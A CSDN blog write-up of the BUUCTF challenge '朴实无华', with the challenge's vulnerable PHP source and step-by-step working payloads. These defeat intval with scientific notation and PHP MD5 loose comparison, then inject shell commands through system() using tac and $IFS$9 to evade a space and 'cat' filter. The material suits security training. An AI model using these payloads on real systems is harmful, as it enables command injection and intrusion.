buuctf 朴实无华

最新推荐文章于 2024-08-20 10:53:37 发布

ANYOUZHEN

最新推荐文章于 2024-08-20 10:53:37 发布

阅读量227

点赞数

文章标签： php 开发语言

本文链接：https://blog.csdn.net/ANYOUZHEN/article/details/125098360

版权

本文详细介绍了如何通过科学计数法绕过intval函数限制，利用MD5弱比较找到特定值，以及在getflag环节中使用tac和$IFS$9来替换cat并避开空格限制，最终成功获取CTF挑战的flag。过程中涉及了Web安全漏洞利用和字符串处理技巧。

摘要由CSDN通过智能技术生成

打开题目

查看一下robots.txt,看一下爬虫规则

打开看看

按f12，查看消息头，有个tips，/fl4g.php

打开后看到一串代码

<?php
header('Content-type:text/html;charset=utf-8');
error_reporting(0);
highlight_file(__file__);


//level 1
if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好.</br>";
    }else{
        die("金钱解决不了穷人的本质问题");
    }
}else{
    die("去非洲吧");
}
//level 2
if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>
去非洲吧

首先是intval函数绕过，GET接收num参数，num要小于2020，加1后要大于2021。

if (isset($_GET['num'])){
    $num = $_GET['num'];
    if(intval($num) < 2020 && intval($num + 1) > 2021){
        echo "我不经意间看了看我的劳力士, 不是想看时间, 只是想不经意间, 让你知道我过得比你好

我们使用的是科学计数法来进行绕过intval函数

当使用科学计数法来判断num<2020时，11e3会被强制转换为int类型，相当于11,但是当用这种办法来判断+1时，科学计数法就会被解析出来11e3+1就是11001，这样就进行了绕过 //11e3代表11000

/fl4g.php/?num=11e3

成功绕过，进入下一关md5绕过

if (isset($_GET['md5'])){
   $md5=$_GET['md5'];
   if ($md5==md5($md5))
       echo "想到这个CTFer拿到flag后, 感激涕零, 跑去东澜岸, 找一家餐厅, 把厨师轰出去, 自己炒两个拿手小菜, 倒一杯散装白酒, 致富有道, 别学小暴.</br>";
   else
       die("我赶紧喊来我的酒肉朋友, 他打了个电话, 把他一家安排到了非洲");
}else{
    die("去非洲吧");
}

两个等于，这里使用的是md5弱比较，只要找到一个值的MD5值等于他本身即可完成绕过，这里我使用0e2159620

/fl4g.php/?num=11e3&md5=0e215962017

最后一关getflag

//get flag
if (isset($_GET['get_flag'])){
    $get_flag = $_GET['get_flag'];
    if(!strstr($get_flag," ")){
        $get_flag = str_ireplace("cat", "wctf2020", $get_flag);
        echo "想到这里, 我充实而欣慰, 有钱人的快乐往往就是这么的朴实无华, 且枯燥.</br>";
        system($get_flag);
    }else{
        die("快到非洲了");
    }
}else{
    die("去非洲吧");
}
?>

GET传参get_flag，然后get_flag参数里不能有空格，同时会将cat转化为wctf2020，说明我们不能单纯使用cat得到flag，得进行绕过

这里的空格的话可以用$IFS$9

尝试着查看上级目录

/fl4g.php/?num=11e3&md5=0e215962017&get_flag=ls

然后这里使用代替cat的是tac，tac是按行倒着显示，最后一行显示在最上面，然后使用$IFS$9来替代空格

构造payload;

/fl4g.php?num=11e3&md5=0e215962017&get_flag=tac$IFS$9fllllllllllllllllllllllllllllllllllllllllaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaag

得到flag

flag{cc92aa3e-626e-4d8b-9fa6-94f7f041c0ef}